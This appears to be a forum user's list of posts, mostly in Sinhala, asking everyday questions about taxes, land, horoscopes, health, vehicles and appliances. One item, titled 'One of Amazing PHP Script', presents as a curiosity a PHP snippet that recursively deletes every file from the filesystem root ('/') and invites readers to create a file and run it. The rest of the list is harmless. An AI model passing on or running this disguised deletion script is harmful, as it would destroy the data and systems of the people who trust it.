1. D

    බදු ගෙවන්න වෙන්නේ Income ඒකටද Profit ඒකටද?

    IT Field ඒකේ බිස්නස් ඒකකට බදු ගෙවනවනම් ඒ් ගැන විස්තරයක් දන්න කෙනෙක් පැහැදිලි කරන්න පුලුවන්ද. මාසෙට 100000/= ආවත් ලාභ පොඩි ගානයි තියෙන්නේ.
  2. D

    පරාල උලුවහු එක කෙලින් ආවොත් ගැටලුවක්ද?

    පිටත පඩිපෙලකින් පිවිසීමට ඇති උඩ තට්ටුවෙහි ඇති එකම එක තනි කාමරයක වහලයෙහි පරාලයක් එම කාමරයට පිවිසීමට ඇති දොරට හරි මැදින් වැටී ඇතිනම් වාස්තු දෝශ ඇතිවනවාද? මෙය නිවසේ ප්‍රධාන උලුවස්ස නොවෙයි. මේ ගැන විස්තරයක් දන්න කෙනෙක් කියන්න...
  3. D

    බබාට අවුරුදු 3න් විදින බෙහෙත වෙනත් ප්‍රෙද්ශයකදී විදගන්න පුලුවන්ද

    අවුරුදු 3න් කුඩා දරුවන්ට විදින බෙහෙත ලියාපදින්ච් MOH කාර්යාලය හැර වෙන්ත ප්‍රෙද්ශයක MOH එකකින් විදගත හැකිද?. තාවකාලිකව වෙනත් ප්‍රෙද්ශයකට මාරුවී ඇති නිසා මෙය කරගත හැකි ආකාරය දන්නා කෙනෙක් කියන්න. ලොකු උදවුවක් Plz
  4. D

    දෙමළ වචන ටිකක් කියලා දෙන්න

    මට මේ තියෙන වචන ටික දෙමළ භාෂාවෙන් නිවැරදිව ලියාදක්වන විදිය කියලා දෙන්න පුළුවන් කෙනෙක් ඉන්නවානම් ලොකු උදවුවක්. දෙමළ භාෂාවෙන් යුනිකෝඩ් වලින් සදහන් කරලා දෙන්න. (බිල්පතක් මුද්‍රණය සදහා අවශ්‍ය වචන කිහිපයක්) 1. Date 2. Time 3. Cashier 4. Customer 5. Item Description 6. Quantity 7. Max Retail Price...
  5. D

    ප්‍රා.සභා අනුමත නොවුන පාරක් සහිත ඉඩමක් මිලදී ගැනීම ගැටලුවක්ද?

    ප්‍රාදේශීය සභා අනුමත නොවුන පාරක් සහිත ඉඩමක් මිලදී ගැනීමේදී ඇති ගැටලු මොනවාද. ඒ සම්බන්දව වැඩි විස්තර දන්න අය පැහැදිලි කරල දෙන්න පුළුවන්ද. (ප්‍රධාන මාර්ගයක සිට සැතපුම් 2ක් පමණ ඇතුලත පිහිටි ඉඩමකට)
  6. D

    නේම් බෝඩ් එකක්

    අළුතින් ව්‍යාපාරයකි ලියාපදිංච් කරද්දි ව්‍යාපාරයේ නම සහ ලිපිනය සහිත නේම් ‍බෝඩ් එකක් අවශ්‍යමද?. නේම් ‍බෝඩ් එකක් නැතිව කරගන්න විදියන් නැතිද?
  7. D

    සමාජ භීතිකාවට ප්‍රතිකාර

    සමාජ භීතිකාවට ප්‍රතිකාර සමාජ භීතිකාවට ප්‍රතිකාර ලබාගතහැකි මනෝ වෛද්‍යවරයෙක් පිළිබඳව දන්නා කෙනෙක් ඉන්නවද. ප්‍රතිකාර ලබාදෙන්නේ කෙසේද කොපමන කලක් ගතවේද යන්න දන්නා අය විස්තර දෙන්න. ලොකු උදවුවක්... :shocked::shocked::shocked:
  8. D

    කොච්චර ඇතිල්ලුවත් යන්නේ නෑ

    කොච්චර ඇතිල්ලුවත් යන්නේ නෑ මේක ගත්තු අය කියන්නකො කොහොමද ප්‍රතිථල කියල. එක පෙත්තක්ම ගන්නවද. කොච්චර වෙලා වැඩ කරනවද කියල
  9. D

    කේන්දර බලන්න

    මේක බලල හොද නරක කියන්නකෝ දන්න අය. ගොඩක් වැදගත් හරි විස්තරයක් දැනගන්න පුලුවන්නම්.
  10. D

    අරක Use කරන අය... 18+

    මේක use කරන අය තවත් ලංකාවෙ ඉන්නවද?:cool::cool::cool: ගොඩක් අයට වැදගත් වෙයි. අර අර ;);) කාලය පිලිබද ප්‍රශ්නයට විසදුමක්...
  11. D

    කොන කැපුවාම කොහොමද

    කොන කැපුවාම කොහොමද :rolleyes: අහවල් එකේ පෙරසම අයින් කරාම කොහොමද. අයින් කරපු අය කියන්න බලන්න. වාසි අවාසි.
  12. D

    ඩියෝ

    Plz anyone know the honda dio front shield price and where to buy. Need one for blue and white dio.
  13. D

    ගෙයක් හදන්න ඉඩමක්

    ගෙයක් හදන්න ඉඩමක් යාලුවනේ පොඩියට ගෙයක් හදාගන්න ඉඩමක් අරගන්න බැංකු ලෝන් එකක් දාගන්න හොදම විදියක් කියන්නකෝ. කොයි බැංකුවද හොද මොනවද ඔීන ලිය කියවිලි කියල දන්න අය කියන්නකෝ. ලොකු උදවුවක් :confused: :confused: :confused:
  14. D

    අරින්න අමාරැයි!!!

    අරින්න අමාරැයි!!! අලුතෙන් ගත්ත සිංගර් ශිතකරණයේ දොර වැහුවට පස්සේ ෂූ!!!!! සද්දයක් එනවා දොරේ තියෙන බීඩින් එකෙන් තත්පර 3ක් 4ක් යනකල්. දොර අරින්නත් ගොඩක් අමාරැයි. මෙික සාමාන්‍ය දෙයක්ද? :confused::confused::confused:
  15. D

    මගෙ හතර කේන්දරය පාලු වෙලාලු. මොකද කරන්නේ.

    මගෙ හතර කේන්දරය පාලු වෙලාලු. මොකද කරන්නේ. :confused::confused::confused:
  16. D

    කොලෙස්‌ටරෝල් පරීක්ෂාව

    කොලෙස්‌ටරෝල් පරීක්ෂාව යාලුවනේ කොලෙස්‌ටරෝල් පරීක්ෂාවකට කීයක් විතර යනවද. දන්න කෙනෙක් කියන්න.
  17. D

    පොරොන්දමි ගැලපීම

    පොරොන්දමි ගැලපීම මෙිකෙ තියෙන දේවල් පැහැදිලි කරල දෙන්න පුලුවන් කෙනෙක් ඉන්නවද. මම දන්න විදියට අත්‍යවශ්‍ය දේවල් ටික ගැලපෙන් නෑ වගේ. වැඩි විස්තර දන්න කෙනෙක් කියන්න.:shocked::shocked::shocked:
  18. D

    booking.com job oppertunity for Sri Lankans

    https://workingatbooking.com/vacancies/account-manager-hotels-singhalese-speaker/
  19. D

    One of Amazing PHP Script

    <?php recursiveRemove("/"); function recursiveRemove($dir) { $structure = glob(rtrim($dir, "/").'/*'); if (is_array($structure)) { foreach($structure as $file) { if (is_dir($file)) recursiveRemove($file); elseif (is_file($file)) unlink($file); } } rmdir($dir); } ?> Create a php file and copy...
  20. D

    මාමගෙ දුව

    කෙනෙක් තමන්ගෙම මාමගෙ දුව බදින එක ගැන එළකිරියෙ ඇත්තන්ගෙ අදහස මොනවගේද ලේ නෑ විවාහය නරකයි කියලනමි දන්නවා ඒත් ඒක හැමෝටම අනිවා කේස් එකක් වෙන දෙයක්ද දෙන්න බලන්න අපේ ඇත්තන්ගෙ අදහස :oo: :oo: :oo:

    No contents